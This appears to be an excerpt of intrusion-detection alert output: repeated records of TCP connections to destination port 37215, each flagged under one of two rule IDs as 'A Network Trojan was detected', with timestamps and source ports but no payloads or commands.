          Timestamp:05/28/24-14:47:44.933460
          SID:2829579
          Source Port:46442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220947
          SID:2835222
          Source Port:60316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774295
          SID:2835222
          Source Port:59796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239159
          SID:2835222
          Source Port:41238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544064
          SID:2829579
          Source Port:34264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944965
          SID:2835222
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473840
          SID:2835222
          Source Port:49594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483094
          SID:2829579
          Source Port:55032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328689
          SID:2835222
          Source Port:60426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818451
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807634
          SID:2835222
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876016
          SID:2835222
          Source Port:37254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2829579
          Source Port:45086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.855894
          SID:2829579
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814528
          SID:2835222
          Source Port:43574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975968
          SID:2835222
          Source Port:46844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400765
          SID:2829579
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140303
          SID:2829579
          Source Port:40662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019512
          SID:2829579
          Source Port:43590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213509
          SID:2835222
          Source Port:40976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771728
          SID:2835222
          Source Port:53914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631630
          SID:2835222
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803238
          SID:2829579
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711270
          SID:2829579
          Source Port:48138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591462
          SID:2829579
          Source Port:42722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739703
          SID:2829579
          Source Port:55516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668889
          SID:2829579
          Source Port:42160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805714
          SID:2829579
          Source Port:59486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756320
          SID:2835222
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841170
          SID:2835222
          Source Port:34102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707839
          SID:2835222
          Source Port:44982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764567
          SID:2829579
          Source Port:57690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208527
          SID:2835222
          Source Port:39016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102739
          SID:2829579
          Source Port:56050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325949
          SID:2835222
          Source Port:54268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114245
          SID:2829579
          Source Port:50144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272299
          SID:2835222
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487367
          SID:2829579
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989095
          SID:2829579
          Source Port:44454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325913
          SID:2835222
          Source Port:57612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537211
          SID:2829579
          Source Port:45052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485410
          SID:2835222
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136851
          SID:2829579
          Source Port:48022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048755
          SID:2835222
          Source Port:43956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151163
          SID:2829579
          Source Port:52700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288258
          SID:2829579
          Source Port:33410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402187
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287604
          SID:2829579
          Source Port:60548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063912
          SID:2835222
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090911
          SID:2829579
          Source Port:34650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146204
          SID:2829579
          Source Port:58480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213736
          SID:2835222
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217180
          SID:2835222
          Source Port:50986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241982
          SID:2835222
          Source Port:48566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067308
          SID:2829579
          Source Port:60948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081449
          SID:2829579
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.621406
          SID:2835222
          Source Port:51990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372611
          SID:2829579
          Source Port:41044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065544
          SID:2829579
          Source Port:40400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268547
          SID:2829579
          Source Port:33508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201799
          SID:2835222
          Source Port:49832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482857
          SID:2835222
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768651
          SID:2829579
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211818
          SID:2835222
          Source Port:50888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698305
          SID:2829579
          Source Port:53482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975296
          SID:2829579
          Source Port:56786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239284
          SID:2829579
          Source Port:34192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153381
          SID:2829579
          Source Port:33846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021554
          SID:2835222
          Source Port:54654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210730
          SID:2835222
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984215
          SID:2829579
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511364
          SID:2835222
          Source Port:59948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879314
          SID:2829579
          Source Port:36274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741679
          SID:2835222
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959007
          SID:2829579
          Source Port:47664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855996
          SID:2835222
          Source Port:56782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115866
          SID:2835222
          Source Port:55606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267093
          SID:2829579
          Source Port:37666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893517
          SID:2835222
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976330
          SID:2835222
          Source Port:37698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728513
          SID:2829579
          Source Port:58090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476636
          SID:2835222
          Source Port:50166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107133
          SID:2835222
          Source Port:50002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271662
          SID:2835222
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.612908
          SID:2835222
          Source Port:37826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.509579
          SID:2835222
          Source Port:46798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806694
          SID:2835222
          Source Port:49178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247562
          SID:2829579
          Source Port:33724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770910
          SID:2829579
          Source Port:49056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559320
          SID:2835222
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996582
          SID:2835222
          Source Port:37622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930850
          SID:2829579
          Source Port:42800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215866
          SID:2829579
          Source Port:48716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610045
          SID:2829579
          Source Port:57904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987312
          SID:2829579
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849184
          SID:2829579
          Source Port:59936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.236932
          SID:2829579
          Source Port:59286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774269
          SID:2829579
          Source Port:33140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336389
          SID:2835222
          Source Port:48568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543043
          SID:2829579
          Source Port:56078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652811
          SID:2829579
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598623
          SID:2835222
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814608
          SID:2835222
          Source Port:42318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178365
          SID:2829579
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216400
          SID:2835222
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923371
          SID:2835222
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529191
          SID:2829579
          Source Port:38368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402166
          SID:2835222
          Source Port:54150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147307
          SID:2829579
          Source Port:53456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322002
          SID:2835222
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666663
          SID:2835222
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173553
          SID:2829579
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463512
          SID:2829579
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.310320
          SID:2835222
          Source Port:41492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042723
          SID:2829579
          Source Port:54566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664431
          SID:2829579
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671450
          SID:2829579
          Source Port:53056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273278
          SID:2829579
          Source Port:42714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.429323
          SID:2835222
          Source Port:48212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403150
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493273
          SID:2835222
          Source Port:50930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855659
          SID:2835222
          Source Port:58684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528142
          SID:2829579
          Source Port:55876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780918
          SID:2829579
          Source Port:54986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048655
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276519
          SID:2835222
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588697
          SID:2829579
          Source Port:50196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238479
          SID:2835222
          Source Port:55504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214128
          SID:2835222
          Source Port:37340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196854
          SID:2829579
          Source Port:36994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497566
          SID:2829579
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782916
          SID:2835222
          Source Port:37722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223292
          SID:2829579
          Source Port:38956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270784
          SID:2835222
          Source Port:38162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170715
          SID:2835222
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742354
          SID:2829579
          Source Port:36430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838428
          SID:2829579
          Source Port:39296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848152
          SID:2829579
          Source Port:60436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241901
          SID:2829579
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536820
          SID:2829579
          Source Port:47842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216400
          SID:2835222
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680616
          SID:2835222
          Source Port:42478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437481
          SID:2829579
          Source Port:58456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804578
          SID:2829579
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953836
          SID:2829579
          Source Port:41388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529997
          SID:2829579
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233006
          SID:2829579
          Source Port:47552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510252
          SID:2835222
          Source Port:37420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656268
          SID:2835222
          Source Port:41694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215805
          SID:2829579
          Source Port:36990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933471
          SID:2829579
          Source Port:49254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.279672
          SID:2829579
          Source Port:37982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298550
          SID:2829579
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594593
          SID:2829579
          Source Port:58600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475735
          SID:2835222
          Source Port:59732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497364
          SID:2829579
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622929
          SID:2829579
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401472
          SID:2829579
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.869112
          SID:2829579
          Source Port:51020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492675
          SID:2835222
          Source Port:38574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483818
          SID:2835222
          Source Port:54394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631728
          SID:2835222
          Source Port:43626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893584
          SID:2829579
          Source Port:42488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680368
          SID:2829579
          Source Port:55454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304292
          SID:2829579
          Source Port:34318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565234
          SID:2829579
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611885
          SID:2829579
          Source Port:50916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328513
          SID:2829579
          Source Port:39646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543257
          SID:2835222
          Source Port:36264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735590
          SID:2829579
          Source Port:40102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561757
          SID:2829579
          Source Port:59270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466331
          SID:2835222
          Source Port:34922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123777
          SID:2829579
          Source Port:33090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301313
          SID:2829579
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269898
          SID:2835222
          Source Port:60834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480468
          SID:2829579
          Source Port:37260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727972
          SID:2835222
          Source Port:49688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431570
          SID:2829579
          Source Port:53714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280890
          SID:2829579
          Source Port:42210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.995702
          SID:2829579
          Source Port:57642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810696
          SID:2835222
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595140
          SID:2829579
          Source Port:34282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709267
          SID:2829579
          Source Port:49550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764334
          SID:2835222
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271918
          SID:2835222
          Source Port:39060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298860
          SID:2835222
          Source Port:38172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291478
          SID:2835222
          Source Port:57594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470873
          SID:2835222
          Source Port:34356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482487
          SID:2829579
          Source Port:38870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549488
          SID:2829579
          Source Port:55382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797231
          SID:2829579
          Source Port:60456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623118
          SID:2835222
          Source Port:53890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685456
          SID:2835222
          Source Port:55950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338564
          SID:2835222
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.608557
          SID:2829579
          Source Port:44790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537513
          SID:2829579
          Source Port:47478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208036
          SID:2835222
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483716
